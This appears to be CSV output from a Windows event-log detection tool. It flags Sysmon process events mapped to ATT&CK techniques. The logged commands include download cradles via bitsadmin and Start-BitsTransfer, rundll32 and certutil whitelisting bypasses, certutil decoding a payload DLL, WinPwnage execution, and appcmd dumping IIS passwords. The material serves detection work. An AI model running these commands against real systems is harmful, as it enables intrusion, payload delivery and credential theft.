rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243516
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.518
747F3D96-9F61-5E75-0000-00109B6C1E00
6620
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1,"
1
5
4
1
0
0x8000000000000000
16443
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:58:54.772
365ABB72-269E-5CD8-0000-001084F81A00
2728
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-268F-5CD8-0000-0010F4A51700
1256
C:\Python27\python.exe
python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243516
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.518
747F3D96-9F61-5E75-0000-00109B6C1E00
6620
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16443
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:58:54.772
365ABB72-269E-5CD8-0000-001084F81A00
2728
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-268F-5CD8-0000-0010F4A51700
1256
C:\Python27\python.exe
python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16443
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:58:54.772
365ABB72-269E-5CD8-0000-001084F81A00
2728
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-268F-5CD8-0000-0010F4A51700
1256
C:\Python27\python.exe
python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
16040
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-11 17:28:22.488
365ABB72-0636-5CD7-0000-0010A6C72100
544
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
c:\windows\System32\cmd.exe
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-F9CD-5CD6-0000-00201B370100
0x1371b
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-0545-5CD7-0000-001078371F00
3044
C:\Windows\System32\dllhost.exe
C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5988
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:20.375
365ABB72-3D70-5CEB-0000-001032EAFF00
1004
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
1
5
4
1
0
0x8000000000000000
4893
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:03.238
747F3D96-660F-5D3F-0000-001055378600
2948
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
1
5
4
1
0
0x8000000000000000
4893
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:03.238
747F3D96-660F-5D3F-0000-001055378600
2948
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5985
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:20.265
365ABB72-3D70-5CEB-0000-001072E6FF00
2640
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" ),1,"
1
5
4
1
0
0x8000000000000000
4892
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:03.184
747F3D96-660F-5D3F-0000-00109B328600
6020
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"
1
5
4
1
0
0x8000000000000000
1966184
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 17:41:08.947
365ABB72-29B4-5C91-0000-0010289AC308
3748
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.EXE /c malwr.vbs
C:\Windows\system32\
EXAMPLE\user01
365ABB72-2209-5C91-0000-0020FA479E03
0x39e47fa
2
High
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-1A4A-5C91-0000-0010455A0000
512
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243514
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.511
747F3D96-9F61-5E75-0000-0010736B1E00
8116
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c notepad.exe ),1,"
1
5
4
1
0
0x8000000000000000
11126
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-09 02:08:00.336
365ABB72-8B80-5CD3-0000-001065512A00
2264
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /c notepad.exe
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-863B-5CD3-0000-00204A390100
0x1394a
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-8B77-5CD3-0000-0010E8FD2900
3836
C:\Windows\System32\sdclt.exe
?
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243514
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.511
747F3D96-9F61-5E75-0000-0010736B1E00
8116
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243514
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.511
747F3D96-9F61-5E75-0000-0010736B1E00
8116
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5982
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:20.164
365ABB72-3D70-5CEB-0000-0010B2E2FF00
2108
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5532
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 15:08:07.355
747F3D96-A357-5D45-0000-0010BD149A01
5396
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-A356-5D45-0000-001014F99901
4056
C:\Windows\System32\mmc.exe
"C:\Windows\System32\mmc.exe" eventvwr.msc
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
143189
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-12 15:06:49.415
747F3D96-BB89-5EBA-0000-001019683600
4688
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
c:\Windows\System32\cmd.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-B086-5EBA-0000-0020BF9E0800
0x89ebf
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-BB89-5EBA-0000-001042653600
1088
C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe
C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1,"
1
5
4
1
0
0x8000000000000000
4890
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:32:58.940
747F3D96-660A-5D3F-0000-0010FFF28500
700
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil -f -decode fi.b64 AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-660A-5D3F-0000-0010B9E08500
3184
C:\Windows\System32\cmd.exe
cmd /c certutil -f -decode fi.b64 AllTheThings.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
16150
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-11 18:10:42.653
365ABB72-1022-5CD7-0000-0010DF121C00
3248
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
c:\Windows\System32\cmd.exe
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
NT AUTHORITY\SYSTEM
365ABB72-8693-5CD7-0000-0020E7030000
0x3e7
1
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-8693-5CD7-0000-0010765E0000
492
C:\Windows\System32\lsass.exe
C:\Windows\system32\lsass.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1,"
1
5
4
1
0
0x8000000000000000
4890
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:32:58.940
747F3D96-660A-5D3F-0000-0010FFF28500
700
C:\Windows\System32\certutil.exe
10.0.17763.1 (WinBuild.160101.0800)
CertUtil.exe
Microsoft® Windows® Operating System
Microsoft Corporation
certutil -f -decode fi.b64 AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-660A-5D3F-0000-0010B9E08500
3184
C:\Windows\System32\cmd.exe
